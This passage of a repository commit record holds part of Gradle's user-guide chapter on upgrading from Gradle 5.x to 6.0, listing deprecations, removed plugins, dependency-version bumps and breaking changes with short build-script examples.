annotation. 
This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` has been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a 
module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilar, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. 
There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use, however they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when 
running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior let to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning. This scenario will become an error in Gradle 7.0.\nUntil then, a deprecation warning will be shown.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use 
`getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. 
Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. 
To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. 
Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n=== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. 
Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required 
org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. 
This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17249d68f7670a6a42d8ab00270ab794db38cc29","subject":"Mention new deprecations in upgrade doc","message":"Mention new deprecations in upgrade 
doc\n","repos":"robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the 